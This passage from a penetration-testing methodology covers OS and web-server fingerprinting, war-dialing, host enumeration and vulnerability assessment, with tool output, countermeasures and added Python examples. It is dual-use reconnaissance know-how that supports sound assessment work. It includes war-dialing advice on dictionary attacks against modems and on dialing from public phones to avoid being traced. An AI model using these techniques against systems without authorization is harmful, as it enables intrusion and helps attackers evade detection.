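As an added example (not p0f's code and not its signature database), the Python below parses a raw IPv4/TCP SYN for the TTL, window size, DF bit and MSS option, estimates hop distance by rounding the TTL up to the nearest common initial value (the "distance" p0f prints), and matches against a small constructed signature table. The packets are built inline; the signatures and addresses are illustrative assumptions, and a real tool also weighs option order, timestamps and IP ID behaviour.

```python
import struct
from typing import Dict, Optional, Tuple

IP_HDR = struct.Struct("!BBHHHBBH4s4s")   # RFC 791 fixed header (20 bytes)
TCP_HDR = struct.Struct("!HHIIBBHHH")     # RFC 793 fixed header (20 bytes)
INITIAL_TTLS = (32, 64, 128, 255)         # initial TTL values common stacks start from

# Constructed, illustrative signatures keyed by (initial TTL, window size, DF bit). Not p0f's database.
SIGNATURES: Dict[Tuple[int, int, bool], str] = {
    (64, 5840, True): "Linux 2.4/2.6 (constructed signature)",
    (128, 65535, True): "Windows XP/2000 (constructed signature)",
    (64, 65535, True): "FreeBSD 5.x (constructed signature)",
}


def _ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_syn(src: str, dst: str, ttl: int, window: int, df: bool = True,
              mss: Optional[int] = None) -> bytes:
    """Constructed IPv4+TCP SYN (checksums left zero) standing in for a captured packet."""
    opts = struct.pack("!BBH", 2, 4, mss) if mss is not None else b""  # MSS option: kind 2, length 4
    data_off = (TCP_HDR.size + len(opts)) // 4
    tcp = TCP_HDR.pack(40000, 80, 1, 0, data_off << 4, 0x02, window, 0, 0) + opts
    flags_frag = 0x4000 if df else 0
    ip = IP_HDR.pack(0x45, 0, IP_HDR.size + len(tcp), 0x1234, flags_frag, ttl, 6, 0, _ip(src), _ip(dst))
    return ip + tcp


def parse_syn(pkt: bytes) -> Optional[dict]:
    """Pull the fingerprint-relevant fields out of a raw IPv4/TCP SYN; None for anything else."""
    if len(pkt) < IP_HDR.size:
        return None
    ver_ihl, _tos, _len, _id, flags_frag, ttl, proto, _csum, src, _dst = IP_HDR.unpack_from(pkt)
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or proto != 6 or len(pkt) < ihl + TCP_HDR.size:
        return None
    _sp, _dp, _seq, _ack, off, flags, window, _tcsum, _urg = TCP_HDR.unpack_from(pkt, ihl)
    if not flags & 0x02 or flags & 0x10:  # SYN set and ACK clear: a new connection attempt
        return None
    opts = pkt[ihl + TCP_HDR.size: ihl + (off >> 4) * 4]
    mss, i = None, 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:          # end of option list
            break
        if kind == 1:          # NOP
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] < 2:
            break              # malformed option list
        length = opts[i + 1]
        if kind == 2 and length == 4:
            mss = struct.unpack("!H", opts[i + 2:i + 4])[0]
        i += length
    return {"src": ".".join(map(str, src)), "ttl": ttl, "df": bool(flags_frag & 0x4000),
            "window": window, "mss": mss}


def initial_ttl(ttl: int) -> int:
    """Round the observed TTL up to the next common initial value; the difference is the hop distance."""
    return next(t for t in INITIAL_TTLS if t >= ttl)


def guess_os(pkt: bytes) -> Optional[dict]:
    fields = parse_syn(pkt)
    if fields is None:
        return None
    init = initial_ttl(fields["ttl"])
    label = SIGNATURES.get((init, fields["window"], fields["df"]), "unknown")
    return {"src": fields["src"], "os": label, "distance": init - fields["ttl"],
            "window": fields["window"], "mss": fields["mss"]}


if __name__ == "__main__":
    # constructed samples: a local Windows host, a Linux host 12 hops away, and a FreeBSD host
    for p in (build_syn("192.0.2.10", "192.0.2.1", 128, 65535),
              build_syn("198.51.100.7", "192.0.2.1", 52, 5840, mss=1460),
              build_syn("203.0.113.5", "192.0.2.1", 64, 65535, mss=1460)):
        print(guess_os(p))
```

The third sample shows why TTL matters: Windows and FreeBSD share the 65535 window here and are told apart only by the estimated initial TTL, which is also why the countermeasure above suggests changing that header field on critical systems.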
B.2.7.2 ACTIVE OS GUESSING
B.2.7.2.1 USING TCP/IP STACK FINGERPRINTING
Description
Use packet generation tools with protocol analyzers or specific tools for active
fingerprinting, to identify brand and version of O.S.
Process
Send custom packets (manually or with the aid of tools) to elicit responses that will yield
O.S. specific information.
Analyze (manually or with an automated tool) the response and match patterns to those of
specific O.S. brands and versions.
Examples/Results
Using nmap with the -O parameter:
# nmap -O 192.168.1.254
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-04 19:45 CDT
Interesting ports on gateway (192.168.1.254):
(The 1662 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:06:25:EC:CC:D9 (The Linksys Group)
Device type: WAP|broadband router
Running: Linksys embedded
OS details: Linksys BEFW11S4 WAP or BEFSR41 router
Analysis/Conclusion/Observation
Active OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
If possible, modify information on packet headers such as TTL in critical systems. This
should at least confuse an attacker, forcing her/him to make more noisy scans that should
show up more easily in intrusion detection systems to alert the target organization.
Links
• http://www.insecure.org/nmap/nmap-fingerprinting-article.html
• http://www.packetwatch.net/documents/papers/osdetection.pdf
• http://www.usenix.org/publications/library/proceedings/sec2000/full_papers/smart/smart_html/index.html
Tools
• Nmap
• Queso
• Several protocol analyzers and packet generators
Remarks
Be aware that some active tests can trigger device filters that would modify the response
(e.g. you might end up fingerprinting a firewall instead of a server behind it).
B.2.7.2.2 USING HTTP PACKET ANALYSIS
Description
Identify brand and version of Web servers through manual analysis of http traffic or
automated tools.
Process
Send custom packets (manually or with the aid of tools) to elicit responses that will yield
Web server specific information.
Analyze (manually or with an automated tool) the response and match patterns to those of
specific Web server brands and versions.
Examples/Results
Using httprint with included signature database:
# ./httprint -h 192.168.1.1 -s signatures.txt
httprint v0.202 (beta) - web server fingerprinting tool
(c) 2003,2004 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
httprint@net-square.com
-------------------------------------------------
Finger Printing on http://192.168.1.254:80/
Derived Signature:
811C9DC5E2CE6922811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5
811C9DC5970EE6BB811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5811C9DC5
E2CE6922E2CE6922E2CE6922811C9DC5E2CE6922811C9DC5E2CE6922811C9DC5
E2CE6922E2CE6922811C9DC5E2CE6922E2CE6922E2CE6922E2CE6922E2CE6922
E2CE6922E2CE6922811C9DC5E2CE6922E2CE6922
Banner Reported: Banner Deduced: Linksys BEFSR41/BEFSR11/BEFSRU31
Score: 65
Confidence: 39.16
-----------------------
Scores:
Linksys BEFSR41/BEFSR11/BEFSRU31: 65 39.16
Linksys AP1: 54 21.96
Linksys Router: 52 19.50
Cisco-HTTP: 46 13.26
Cisco Pix 6.2: 46 13.26
…
Analysis/Conclusion/Observation
HTTP protocol fingerprinting will provide information on the Web server brand and version.
This information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart Web Server identification of critical systems.
Countermeasures
If possible, modify Web Server configuration such as HTTP banners in critical systems.
This should at least confuse an attacker, forcing her/him to make more noisy scans that
should show up more easily in intrusion detection systems to alert the target organization.
Links
• http://net-square.com/httprint/httprint_paper.html
Tools
• HTTPrint
• Netcat
• Several protocol analyzers
Remarks
HTTP fingerprinting is useful even if the web server is behind a web proxy; proxies will filter
and normalize illegal/suspicious requests but will leave answers from the Web servers
unaltered for the most part. Assessors should use this to help identify false positives with
other fingerprinting tests (e.g. an IIS server showing up on a machine previously identified
as a Linux server would indicate that something is wrong; most probably with the O.S.
fingerprinting test).
B.2.7.2.3 USING ICMP PACKET ANALYSIS
Description
Use ICMP packet generation tools with protocol analyzers or specific tools for active
fingerprinting, to identify brand and version of O.S.
Process
Send custom ICMP packets (manually or with the aid of tools) to elicit responses that will
yield O.S. specific information.
Analyze (manually or with an automated tool) the response and match patterns to those of
specific O.S. brands and versions.
Examples/Results
Using xprobe2:
# xprobe2 192.168.0.254
Xprobe2 v.0.2.2 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
[+] Target is 192.168.0.254
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping - ICMP echo discovery module
[x] [2] ping:tcp_ping - TCP-based ping discovery module
[x] [3] ping:udp_ping - UDP-based ping discovery module
[x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan - TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
[+] 11 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 192.168.0.254. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 192.168.0.254. Module test failed
[-] No distance calculation. 192.168.0.254 appears to be dead or no ports known
[+] Host: 192.168.0.254 is up (Guess probability: 25%)
[+] Target: 192.168.0.254 is alive. Round-Trip Time: 0.00259 sec
[+] Selected safe Round-Trip Time value is: 0.00518 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[+] Primary guess:
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.0" (Guess probability: 51%)
[+] Other guesses:
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.19" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.25" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.17" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.23" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.15" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.21" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.21" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.15" (Guess probability: 51%)
[+] Host 192.168.0.254 Running OS: "Linux Kernel 2.2.23" (Guess probability: 51%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
Analysis/Conclusion/Observation
Active OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
If possible, filter ICMP responses from critical systems to the Internet. This should at least
confuse an attacker, forcing her/him to make more noisy scans that should show up more
easily in intrusion detection systems to alert the target organization.
Be aware that you should at least allow ICMP type 3, code 4 responses (i.e. Fragmentation
Needed but DF set ICMP packets) to pass through your filters. This is necessary for the
proper operation of the network.
Links
• http://www.phrack.org/show.php?p=57&a=7
• http://blackhat.com/presentations/bh-usa-03/bh-us-03-arkin.pdf
• http://www.linuxsecurity.com/resource_files/firewalls/firewall-seen.html#2
Tools
• Xprobe
Remarks
B.2.7.2.4 USING TELNET HANDSHAKE ANALYSIS
Description
Use packet generation tools with protocol analyzers or specific tools for active
fingerprinting, to identify brand and version of O.S.
Process
Connect to a telnet server using manual procedures or automated tools and fingerprint the
O.S. brand and version via the DO and DON'T option negotiation headers.
Examples/Results
Using telnetfp:
# ./telnetfp 10.0.0.1
telnetfp0.1.2 by palmers / teso
DO: 255 253 24 255 253 32 255 253 35 255 253 39 255 253 36
DONT:
255 250 32 1 255 240 255 250 35 1 255 240 255 250 39 1 255 240 255 250 24 1 255
240
Found matching finger print: FreeBSD
Digital Unix 4.0d/e
NetBSD 1.4.2
Tru64 UNIX V5.0A
Using nmap with the -sV option and restricted ports:
# nmap -sV -p21-23 10.0.0.2
Starting nmap 3.55 ( http://www.insecure.org/nmap/ )
Interesting ports on 10.0.0.2:
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 3.4-j2 (protocol 1.99)
23/tcp open telnet Openwall GNU/*/Linux telnetd
Analysis/Conclusion/Observation
Active OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
If possible, modify Telnet Server configuration such as Welcome banners in critical
systems. This should at least confuse an attacker, forcing her/him to make more noisy
scans that should show up more easily in intrusion detection systems to alert the target
organization.
Links
• http://www.sans.org/resources/idfaq/fingerp_telnet.php
Tools
• Telnetfp
• Nmap (-sV option)
• Several protocol analyzers and netcat
Remarks
Most sites have telnet protocol filtered for the Internet, or have replaced it with more secure
options such as secure shell (SSH).
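Added example, not telnetfp's code: a Python decoder for the Telnet option negotiation bytes shown in the telnetfp output above (IAC DO/DONT/WILL/WONT <option> and IAC SB <option> ... IAC SE sequences, RFC 854/855), plus a signature string recording the order in which the server offered options, which is the feature such tools match. The signature format is this example's own; the sample bytes are the ones printed in the telnetfp run above (the "DONT:" line there actually holds the SB subnegotiations).

```python
from dataclasses import dataclass
from typing import List, Optional

IAC, SE, SB = 255, 240, 250
COMMANDS = {251: "WILL", 252: "WONT", 253: "DO", 254: "DONT"}
# Telnet option numbers from the IANA registry that servers commonly negotiate at connect time
OPTIONS = {
    0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 5: "STATUS", 6: "TIMING-MARK",
    24: "TERMINAL-TYPE", 31: "NAWS", 32: "TERMINAL-SPEED", 33: "REMOTE-FLOW-CONTROL",
    34: "LINEMODE", 35: "X-DISPLAY-LOCATION", 36: "ENVIRON", 39: "NEW-ENVIRON",
}


@dataclass
class Item:
    kind: str                      # "DO", "DONT", "WILL", "WONT", "SB", "TEXT" or "CMD<n>"
    option: Optional[int] = None
    name: Optional[str] = None
    payload: bytes = b""           # SB contents, or the raw text for TEXT items


def decode_negotiation(data: bytes) -> List[Item]:
    """Split a server's opening bytes into negotiation commands, subnegotiations and banner text."""
    items: List[Item] = []
    i = 0
    while i < len(data):
        if data[i] != IAC:  # plain banner text up to the next IAC
            j = data.find(bytes([IAC]), i)
            j = len(data) if j < 0 else j
            items.append(Item("TEXT", payload=data[i:j]))
            i = j
            continue
        if i + 1 >= len(data):
            raise ValueError("dangling IAC")
        cmd = data[i + 1]
        if cmd in COMMAND_NAMES:
            if i + 2 >= len(data):
                raise ValueError("truncated option command")
            opt = data[i + 2]
            items.append(Item(COMMANDS[cmd], opt, OPTIONS.get(opt, f"OPT{opt}")))
            i += 3
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0 or i + 2 >= len(data):
                raise ValueError("unterminated subnegotiation")
            opt = data[i + 2]
            items.append(Item("SB", opt, OPTIONS.get(opt, f"OPT{opt}"), data[i + 3:end]))
            i = end + 2
        elif cmd == IAC:  # escaped 0xFF data byte
            items.append(Item("TEXT", payload=b"\xff"))
            i += 2
        else:  # two-byte commands such as NOP (241) or GA (249)
            items.append(Item(f"CMD{cmd}"))
            i += 2
    return items


COMMAND_NAMES = COMMANDS  # alias kept for readability in decode_negotiation


def negotiation_signature(data: bytes) -> str:
    """Order of option numbers the server offers, per command; the feature telnetfp matches."""
    items = decode_negotiation(data)
    parts = []
    for kind in ("DO", "DONT", "WILL", "WONT", "SB"):
        nums = [str(it.option) for it in items if it.kind == kind]
        if nums:
            parts.append(f"{kind}:" + ",".join(nums))
    return " ".join(parts)


# The server's first bytes as telnetfp printed them above (sample taken from that output)
SAMPLE = bytes([255, 253, 24, 255, 253, 32, 255, 253, 35, 255, 253, 39, 255, 253, 36,
                255, 250, 32, 1, 255, 240, 255, 250, 35, 1, 255, 240,
                255, 250, 39, 1, 255, 240, 255, 250, 24, 1, 255, 240])

if __name__ == "__main__":
    for item in decode_negotiation(SAMPLE):
        print(item)
    print(negotiation_signature(SAMPLE))
```

Run on the sample, the decoder shows the server asking the client to DO TERMINAL-TYPE, TERMINAL-SPEED, X-DISPLAY-LOCATION, NEW-ENVIRON and ENVIRON and then sending a SEND (1) subnegotiation for each, before any welcome banner; that ordering is what differs between telnetd implementations and is why changing the banner alone does not stop this kind of fingerprinting.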
B.2.7.2.5 BANNER GRABBING ANALYSIS AND CORRELATION
Description
Use information acquired during Banner Grabbing test to identify inconsistencies and select
specific target services for future tests (e.g. vulnerability scanning).
Process
Fill in a matrix of information for each server for correlation, including:
• Service type
• Banner
• Service brand
• Service version
Identify false positives and mark their (probable) cause.
Search the Internet for relevant information on these services and include the following
information:
• Known vulnerabilities
• Configuration issues or parameters that you might want to test further
Analysis/Conclusion/Observation
Banner analysis and correlation with other information gathered from scanning tests will
provide attackers and assessors with valuable information to focus further tests and decide
where manual tests for vulnerabilities (usually related to configuration issues) should take
place.
Countermeasures
Organizations should ensure that only required information about services/O.S. brands and
versions is available from the Internet.
Links
• http://www.hackinthebox.org/article.php?sid=7947
Tools
• Spreadsheets
• Databases
• Logic programming languages (e.g. Prolog)
Remarks
If the amount of data, the lack of key information and the number of false positives make
the analysis difficult on a spreadsheet, consider using a database or a logic programming
language such as Prolog.
You can build a database that includes information from previous assessments, so that
it will be easier to fingerprint a system by correlating information via queries to this
database.
B.2.8 Perform War-dialing
Description
In war-dialing, a modem connection request is sent to each number in the target range.
Once modems are identified in the target range, password guessing and dictionary attacks
are performed against the user name/password challenge. Sometimes only a password is
required to gain unauthorized access.
History shows that many attacks were launched using modems. This is due to the increase
in laptops and hence the increase in modems. The following are recommendations for
performing war-dialing:
• It is recommended to conduct war-dialing once a year.
• It is recommended to conduct war-dialing after office hours; this avoids disturbing the
organization's phone system and employees.
• Test separately any modems that are turned off after office hours.
• Exclude important numbers (e.g. emergency lines, operations center) from your list to
avoid the negative impact of many calls.
• Do war-dialing from public phone lines if possible, because war-dialing would raise an
alarm in almost all telecommunication companies and they would find you faster than
you think.
It's common to find Challenge Handshake Authentication Protocol (CHAP) implementations
in Remote Access Servers. One needs a tool that supports CHAP while war-dialing; most
freeware doesn't support this.
Process
• Identify phone number ranges that the target organization uses
• Find listening modems/RAS servers
• Identify the devices that answered
• Guess passwords
• Perform a dictionary attack
Examples/Results
Analysis/Conclusion/Observation
Modems constitute another way to get into a network. These access paths are usually not
as well defended as the perimeter with the Internet using dedicated connections.
Countermeasures
• Remove unauthorized modems after verification.
• If unauthorized modems cannot be removed, block inbound calls to them at the PBX.
• For authorized modems, try to configure a call-back system to authorized phone
numbers.
• Place firewalls and IDS/IPS behind remote access servers with modems.
Links
• http://www.atstake.com/research/reports/acrobat/wardialing_brief.pdf
• http://www.sans.org/rr/whitepapers/testing/268.php
Tools
• THC-Scan
• Typhon III's war-dialer component
• ISS's "Telephony Scanner"
Remarks
Apart from being time consuming, war-dialing can also cause the assessor to incur high
costs, depending on the location of the testing machines and the target's location.
Use of RAS systems is becoming less common. However, since they provide an effective
access alternative to the Internet in case of major failures, organizations of a certain type
and size will try to maintain some of these systems for emergency situations.
B.2.9 Host Enumeration
B.2.9.1 SYSTEMS ENUMERATION
Description
Use information acquired during Banner Grabbing Analysis and Correlation test and other
fingerprinting and scanning tests to enumerate services within servers (and to confirm the
O.S. of the scanned system).
Host enumeration allows for information to be organized, so that additional data can be
inferred and false positives can be easily identified.
Process
For each server scanned, fill in the following information (e.g. in a matrix):
• Server IP
• Server FQDN
• List of services discovered (including references to information from the Banner
Grabbing Analysis and Correlation test)
• O.S. fingerprint information (from previous tests)
• Network localization tests (from network mapping tests and traceroutes, if available)
From the above data, you should be able to infer and document the following information
for each server:
• Purpose for the business
• Impact of the server on the target's business
• Relationships with other servers and network devices (e.g. trust relationships)
Analysis/Conclusion/Observation
Analysis and correlation with other information gathered from scanning tests will provide
attackers and assessors with valuable information to focus further tests and decide where
manual tests for vulnerabilities (usually related to configuration issues) should take place.
Countermeasures
Organizations should ensure that only required information about services/O.S. brands and
versions is available from the Internet.
Links
• http://www.hackinthebox.org/article.php?sid=7947
Tools
• Spreadsheets
• Databases
• Logic programming languages (e.g. Prolog)
Remarks
If the amount of data, the lack of key information and the number of false positives make
the analysis difficult on a spreadsheet, consider using a database or a logic programming
language such as Prolog.
You can build a database that includes information from previous assessments, so that
it will be easier to fingerprint a system by correlating information via queries to this
database.
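The following Python/sqlite3 code is an added example, not part of ISSAF, of the database approach that both this section and B.2.7.2.5 (Banner Grabbing Analysis and Correlation) recommend: it loads host, service and banner records into tables and uses queries to produce the per-host matrix and to find the false positives where a banner's product family contradicts the O.S. fingerprint (the IIS-on-Linux case the HTTP fingerprinting remarks describe). The hosts, banners and the brand-to-OS rule table are constructed sample data using RFC 5737 addresses.

```python
import sqlite3
from typing import List, Optional, Tuple

# Constructed sample data standing in for real scan, fingerprint and banner results.
HOSTS: List[Tuple[str, str, str]] = [          # ip, fqdn, O.S. from stack fingerprinting
    ("203.0.113.10", "www.example.com", "Linux 2.4.x"),
    ("203.0.113.11", "mail.example.com", "Windows 2000"),
]
SERVICES: List[Tuple[str, int, str, str, str, Optional[str]]] = [  # ip, port, service, banner, brand, version
    ("203.0.113.10", 22, "ssh", "SSH-1.99-OpenSSH_3.4", "OpenSSH", "3.4"),
    ("203.0.113.10", 80, "http", "Server: Apache/2.0.52 (Unix)", "Apache", "2.0.52"),
    ("203.0.113.10", 8080, "http", "Server: Microsoft-IIS/5.0", "IIS", "5.0"),
    ("203.0.113.11", 25, "smtp", "220 mail.example.com Microsoft ESMTP MAIL Service", "Exchange", None),
]
# brands that only run on one O.S. family; NULL means the brand says nothing about the O.S.
BRAND_OS: List[Tuple[str, Optional[str]]] = [
    ("IIS", "Windows"), ("Exchange", "Windows"), ("OpenSSH", None), ("Apache", None),
]


def build_db(hosts, services, brand_os) -> sqlite3.Connection:
    """Create the correlation tables in memory and load the records."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE host(ip TEXT PRIMARY KEY, fqdn TEXT, stack_os TEXT);
        CREATE TABLE service(ip TEXT REFERENCES host(ip), port INTEGER, service TEXT,
                             banner TEXT, brand TEXT, version TEXT);
        CREATE TABLE brand_os(brand TEXT PRIMARY KEY, os_family TEXT);
    """)
    con.executemany("INSERT INTO host VALUES (?, ?, ?)", hosts)
    con.executemany("INSERT INTO service VALUES (?, ?, ?, ?, ?, ?)", services)
    con.executemany("INSERT INTO brand_os VALUES (?, ?)", brand_os)
    con.commit()
    return con


def find_conflicts(con: sqlite3.Connection) -> List[Tuple[str, int, str, str]]:
    """Services whose banner brand implies an O.S. family that disagrees with the stack fingerprint."""
    return con.execute("""
        SELECT s.ip, s.port, s.brand, h.stack_os
          FROM service s
          JOIN host h ON h.ip = s.ip
          JOIN brand_os b ON b.brand = s.brand
         WHERE b.os_family IS NOT NULL AND h.stack_os NOT LIKE b.os_family || '%'
         ORDER BY s.ip, s.port""").fetchall()


def host_matrix(con: sqlite3.Connection) -> List[Tuple[str, str, str, int]]:
    """One row per host: ip, fqdn, fingerprinted O.S., number of services found."""
    return con.execute("""
        SELECT h.ip, h.fqdn, h.stack_os, COUNT(s.port)
          FROM host h LEFT JOIN service s ON s.ip = h.ip
         GROUP BY h.ip ORDER BY h.ip""").fetchall()


if __name__ == "__main__":
    db = build_db(HOSTS, SERVICES, BRAND_OS)
    for row in host_matrix(db):
        print(row)
    for ip, port, brand, os_name in find_conflicts(db):
        print(f"check {ip}:{port}: {brand} banner on a host fingerprinted as {os_name} (proxy or wrong fingerprint?)")
```

Adding an assessment date column to `host` and `service` is enough to keep records across engagements, which is the "information from previous assessments" use the Remarks above have in mind.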
B.2.9.2 WINDOWS SYSTEMS
Description
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Links
Tools
Remarks
B.2.9.3 NOVELL SYSTEMS
Description
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Links
Tools
Remarks
B.2.10 Analyze all the information gained
All previously identified and gathered information should be put together into a network
drawing. This is an important step to learn how the network and systems fit together.
Specific target information (e.g. server documentation) should be assessed and
classified in an order of probable impact and vulnerability degree.
Also, all false positives previously found should be analyzed and documented.
B.2.11 Global Countermeasure
General countermeasures for previous findings should take place at this phase. This
documentation will include general recommendations, such as:
• Allow only necessary services.
• Change existing default banner(s)
• Limit unnecessary services at the border firewall/router
o Block/drop ICMP request(s)
o Block/drop unnecessary TCP SYN packet(s)
o Block/drop unnecessary UDP packet(s)
B.3 VULNERABILITY ASSESSMENT (IDENTIFICATION)
Description
This section provides information about vulnerability identification, how vulnerabilities
are evaluated, and the types of tools used. It familiarizes the IT staff involved in the
vulnerability assessment team with the process and also provides guidelines to the
assessment team.
Vulnerability Identification moves one stage deeper taking the enumerated data, network
topology and gathered information to find flaws within the network, servers, services and
other attached information resources. From the network mapping and enumeration you
are looking at factors such as how accurately you can identify services and operating
systems. With this information (open ports etc) you will be able to build a catalogue of
vulnerable servers/hosts. During this section such tools as vulnerability scanners, cgi
scanners and various other tools can be used (Nessus/ ISS/ Whisker/ Nikto) to highlight
vulnerabilities and match them to known exploits.
Previous information should allow the assessor to fine tune vulnerability scanning tools
so as to avoid false positives and focus on relevant issues, instead of blindly scanning a
range of network servers with all test patterns available. Broad vulnerability scanning
without fine tuning is considered a bad practice, since it increases considerably the
number of false positives and false negatives, and reduces the quality of the
assessment.
Aim/Objective
The aim of this stage is to use the information gathered earlier to make a technical
assessment of the actual existence of vulnerabilities. This is done by matching
vulnerable service versions to known and theoretical exploits, traversing the network in
unintended directions, testing web services for vulnerabilities such as XSS and SQL
injection, locating weak passwords and accounts, escalating privileges, and so on, as
detailed in the main body of the document. During the vulnerability identification stage
you intend to identify as many positive intrusion/penetration avenues into the target
network as possible. If required, these can be demonstrated in the next section, proof of
concept.
Process
• Step 1: Identify vulnerable services for known vulnerabilities, using service banners,
O.S./service fingerprints, open ports and all relevant information from previous stages.
Banner information can be gathered by running an automated banner grabber or a
customized tool, or taken from information gathered in previous steps.
• Step 2: Perform a vulnerability scan with automated scanners for known vulnerabilities
o Perform TCP (including both SYN and CONNECT scan methods), UDP and ICMP scans
o Feed the entire results (1-65535, TCP+UDP) of the port scanning tool gathered in the
port scanning step into the vulnerability assessment tool.
o Un-check denial of service plug-ins. Check manually whether any denial of service
plug-in is selected in any category.
• Step 3: Identify undisclosed vulnerabilities [Optional]
o Identify undisclosed vulnerabilities that are circulating in the underground
o Audit source code and/or program binaries to identify vulnerabilities that are not
available in public vulnerability databases.
• Step 4: Make a list of all vulnerabilities found
Here, make a list of all the vulnerabilities found by both scanners. Some well-known
false positives from specific scanners can be left out of this list.
• Step 5: Perform false positive and false negative verification
Refer to the corresponding appendix for more details.
• Step 6: Make a final list of vulnerabilities and recommend immediate measures
In this stage, review all vulnerabilities discovered by the assessment tool[s]. Interpret the
results and make a final list of vulnerabilities based on the severity of each vulnerability
and the criticality of the asset. Discuss identified vulnerabilities with IT staff as needed,
since they know better whether the services implemented on the systems are required.
Identify which vulnerabilities require immediate measures and inform management
immediately, with countermeasures to safeguard them.
Prepare a vulnerability summary as per domain/components based on severity of
risk, based on business process impact. Note that this classification might differ
significantly from technical risk classification.
Technical risk classification of vulnerabilities is usually done automatically by
vulnerability scanning tools, and relatively accurately (provided that the false
positive/negative rates are low). However, an analysis based on business impact is more
useful for the target organization: it gives added value to the project and makes it easier
to schedule projects to apply fixes, as well as to justify their budget.
In other words, simply running the tools and handing over the reports they generate
(with only technical assessments) is a poor practice and gives little value to the
assessed organization (i.e. the target organization will question whether it would not be
cheaper to buy/download and run the tools themselves and get the same benefits).
Since business impact requires deep knowledge of the target organization and its
processes, the assessor should first deliver a first draft based on previous
experience. Yet, this document needs to be reviewed along with personnel of the
assessed organization to properly identify the business impact, and the corresponding
adjustments should be made.
Along with this report, the assessor will deliver a technical report that will contain
mostly the findings reported by the tools, but extending the documentations and
explaining technical impact for the particular case of the target organization, where
appropriate.
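As an added example (not ISSAF's own tooling), the Python below carries out steps 4 to 6 on constructed scanner output: it merges the findings of two scanners, drops a well-known false positive, and classifies each finding by business impact using the criteria this section sets out (high: an immediate threat of high adverse impact on business-critical processes, fix within a week, report at once; medium: high impact on non-critical systems, or critical systems without an immediate threat, about two weeks, report after the assessment; low otherwise). The findings, the set of critical hosts, the `immediate` flag and the decision to treat every unmatched case as low are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Finding:
    scanner: str
    host: str
    port: int
    title: str
    technical: str     # scanner's technical rating: "high", "medium" or "low"
    immediate: bool    # assumption: True when the scanner reports the flaw as exploitable now


@dataclass
class Classified:
    host: str
    port: int
    title: str
    technical: str
    risk: str
    deadline: str
    reporting: str
    sources: Tuple[str, ...]


def business_risk(technical: str, asset_critical: bool, immediate: bool) -> Tuple[str, str, str]:
    """Apply the classification criteria of this section: (risk, fixing deadline, reporting rule)."""
    if technical == "high" and asset_critical and immediate:
        # immediate threat of high adverse impact on business-critical processes
        return "high", "fix within one week", "report immediately; suspend tests if agreed"
    if technical == "high" and not asset_critical:
        # high adverse impact, but on systems that are not critical to the business
        return "medium", "fix within about two weeks", "report after the assessment"
    if technical != "low" and asset_critical:
        # affects critical systems without an immediate threat or big impact (e.g. tolerable DoS)
        return "medium", "fix within about two weeks", "report after the assessment"
    # assumption: anything the stated criteria do not match is treated as low here
    return "low", "fix in the next maintenance window", "report after the assessment"


RANK = {"high": 0, "medium": 1, "low": 2}


def final_list(findings: List[Finding], critical_hosts: Set[str],
               known_false_positives: Set[Tuple[str, str]]) -> List[Classified]:
    """Steps 4-6: merge both scanners' output, drop known false positives, rank by business impact."""
    merged: Dict[Tuple[str, int, str], Tuple[Finding, Tuple[str, ...]]] = {}
    for f in findings:
        if (f.scanner, f.title) in known_false_positives:
            continue
        key = (f.host, f.port, f.title.lower())
        if key in merged:
            first, sources = merged[key]
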